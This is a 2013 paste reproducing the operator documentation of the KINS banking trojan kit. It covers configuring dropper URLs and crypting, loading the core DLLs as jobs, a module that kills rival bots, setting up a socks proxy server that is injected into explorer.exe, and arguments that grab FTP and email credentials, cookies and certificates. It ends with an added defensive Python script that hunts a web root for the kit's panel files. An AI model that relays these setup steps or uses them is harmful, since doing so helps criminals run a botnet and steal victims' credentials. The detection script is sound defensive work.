Xylitol

KINS Product description

Sep 27th, 2013
Product description:
url1, url2, url3 - URLs of the dropper gate (exe file).

In addition to the main one, there are two spares in case your domain gets locked.
This is the file that gets loaded. It must be crypted.

delay - the check-in delay.

retry - the polling interval of the bot core.

buildid - the botnet name of the dropper.

encryption_key - encryption key.

url_server - the gate of admin panel "B", that is, the core admin panel.

$ - Notify.
! - Ban.
@ - Screenshots (full-size).

Macros:
%BOTID% - bot ID.
%opensocks% - automatic opening of socks on the transition to H HRM.

captcha_server - interception of CAPTCHA. Works with AD. Leave as is.

After the config is built, 3 files are issued - dropper.exe, bot32.dll, bot64.dll - and you are also given the file softwaregrabber.dll,
which has already been built independently of the first three.

dropper.exe - the dropper file (50 kb), which pulls the bot core (2 cores, bot32.dll and bot64.dll). This file is crypted.

bot32.dll - core for 32-bit systems.
bot64.dll - core for 64-bit systems.
For both: crypting is not necessary; they are auto-crypted in memory. These modules are the basis of the bot and are responsible for injection into processes and browser grabbing.

softwaregrabber.dll - the port-opening module. Responsible for grabbing FTP \ Email \ pop3 \ Billing \ screen and for checking the check-in of the core modules. Crypting is not necessary; it is auto-crypted in memory.

The core of the bot. RULES FOR LINKING AND LOADING. Pay special attention.

- Adding a file in the "Files" section. The files bot32.dll, bot64.dll, softwaregrabber.dll and other modules, including third-party dll or exe files, are added as jobs.
Name and version are chosen as desired. The bot works with the modules of Zutick, Shylock, SpyEye, but without an open API (optional) leave the argument empty.
Attention! Linking with a module. First, load the core modules. The core modules should not be linked to anything. Next, load the module softwaregrabber.dll,
which should be linked to bot32.dll.

- Assign jobs to the modules in the "job" section. Key points to note:
a) For the core modules select the loading mode "reusable".
For the softwaregrabber module - "one-off" or "reusable".
b) For the number of times (executions) put a big number, e.g. 9999999.

- The jobs "written in the config" and "input commands manually" are available only with the open API. The "send logs" setting is available only for the debug version,
which is made on request and in extreme cases. In this case, the dropper's installation and privilege-acquisition logs go to the "logs" section.

- Net \ dirty - a necessary attribute if you decide to load the bots in one hand.

- Updating a dll follows the scheme i+1, preserving the bot name in the files and jobs, if the update must be applied in sequence, and the scheme i, if the update
is applied after the reboot.

- To update the statistics in the dropper admin panel, do not forget to add the task to CZK.

- The difference between admin panels "A" and "B" indicates the quality of your traffic. Bot cores check in only after obtaining logs. If
the core is loaded onto, say, a dedicated server where there is no activity, the bot will appear in admin panel "B" but will not appear in admin panel "A".
You can always see the number of loaded bot cores under "jobs" in the dropper admin panel. With bad traffic the difference may reach 90%;
we only show the objective state of things.

The mod-killer module is designed to keep your bots clean of third-party bots and unwanted software.
- Deletes Citadel (all), Zeus (all), SpyEye (all), IceIX (all), Evolution (all) and their derivatives, Carberp (exception - bootkit),
Zutick, Lickat, Shylock, Gazavat (Sality).
- Deletes third-party malicious software, such as loaders, RATs, DDoS bots, based on heuristic analysis.
- Removes unwanted software, such as click bots and search-result spoofing bots, based on heuristic analysis.
- Removes common bots, even in crypted form, on the basis of signatures.
- Full integration with the bot's neural network. Analysis of unsigned software, processes without windows, etc.

Installation Options:
Specify the arguments (SpyEye arguments in the core admin panel)
"77_uninstall;" - removal of unwanted software, such as clicker bots, etc.
"77_replace_with = http://aa.ru/file.exe" (if you have software to load, but competitors load similar software onto your bots) - downloads the new bot with RLS immunity to the deleter - 77_uninstall
"Report;" - bug report in the core admin panel.
"Clean_zeus_based;" - deletes all versions of popular bots on the basis of signatures.
Several arguments can be written on one line. Each argument must end with ";".
Load the module files and set the linked value to the core bot32.dll.

In order to use the socks module, perform these steps:
1) Find a server, preferably Windows (a dedicated server with apache / nginx / xamp / denwer installed will do; in general, you need a server
with php installed). *nix under Wine is also supposed to work.
2) Upload the socks_server folder to the server and set permissions 777 on everything.
3) Take the link to the gate.php file on the server and remember it.
4) Go to the dropper admin panel, add socks5Server32.dll and socks5Server64.dll, and in the arguments specify the link from step 3).
Where to inject - explorer.exe.
5) Take the socks as IP:Port by going to the link "your_server"/control.php, or from log.txt.
Sometimes clean up the connections by clicking Kill Tasks. The terminal supports socks versions 4 and 5 per the RFC standard.
Authorization is not required. There is no need to worry about ports for the bots; they take them from the gate.
WARNING! The module must be linked to the core: socks5Server32.dll to bot32.dll and socks5Server64.dll to bot64.dll respectively.
Attention! In the jobs and files the names must be exactly socks5Server32.dll and socks5Server64.dll.
Auto-opening of socks is done via the macro //%opensocks% in injects.

The softwaregrabber module is designed for grabbing FTP, email, pop3 data and certificates.
The module is integrated with the bot's common neural network and is a base module for the core.

Installation Options:
Specify the arguments (SpyEye arguments in the core admin panel)
"Grab_all;" - grab everything: all FTP data, all recorded email addresses + account contacts,
IE and FF cookies (removed where possible after sending to the admin panel), and certificates from the MY store (exported to the admin panel
under the password "GCert").
"Grab_emails;" - grab only email addresses.
"Grab_ftps;" - grab only FTP.
"Grab_certs;" - grab only certificates.
"Grab_sol;" - grab sol cookies.
Several arguments can be written on one line. Each argument must end with ";".
Load the module files and set the linked value to the core bot32.dll.
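
For defenders triaging a web host, the socks steps above describe a recognizable on-disk layout: a socks_server folder holding gate.php, control.php and log.txt with 777 permissions. The following is an added example, not part of the paste or the kit: a hunt script that flags directories matching that layout. The triage score and the constructed sample tree are assumptions made for illustration.

```python
import os
import stat
import tempfile

# Names taken from the socks setup steps in the paste above.
PANEL_DIR = "socks_server"
PANEL_FILES = {"gate.php", "control.php", "log.txt"}


def scan_webroot(root):
    """Return directories under root that resemble the described panel layout."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        present = PANEL_FILES & {f.lower() for f in filenames}
        name_hit = os.path.basename(dirpath).lower() == PANEL_DIR
        # gate.php next to control.php is reported even if the folder was renamed.
        pair_hit = {"gate.php", "control.php"} <= present
        if not (name_hit or pair_hit):
            continue
        # 'other' may write: what a blanket 777 leaves behind.
        writable = bool(os.stat(dirpath).st_mode & stat.S_IWOTH)
        findings.append({
            "path": dirpath,
            "name_match": name_hit,
            "files": sorted(present),
            "world_writable": writable,
            # Hypothetical triage score: one point per matching trait.
            "score": int(name_hit) + len(present) + int(writable),
        })
    return sorted(findings, key=lambda f: -f["score"])


def build_constructed_tree(base):
    """Create a constructed sample web root (empty files) for a dry run."""
    layout = {
        "site": (["index.php", "gate.php"], 0o755),            # benign, one name only
        "uploads/socks_server": (sorted(PANEL_FILES), 0o777),  # layout from the paste
        "renamed": (["gate.php", "control.php"], 0o755),       # folder renamed
    }
    for rel, (files, mode) in layout.items():
        d = os.path.join(base, rel)
        os.makedirs(d)
        for name in files:
            open(os.path.join(d, name), "w").close()
        os.chmod(d, mode)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_constructed_tree(tmp)
        print(scan_webroot(tmp))
```

A hit is a lead for review, not a verdict: file names this generic also occur in legitimate PHP applications, so confirm with file contents and web server access logs.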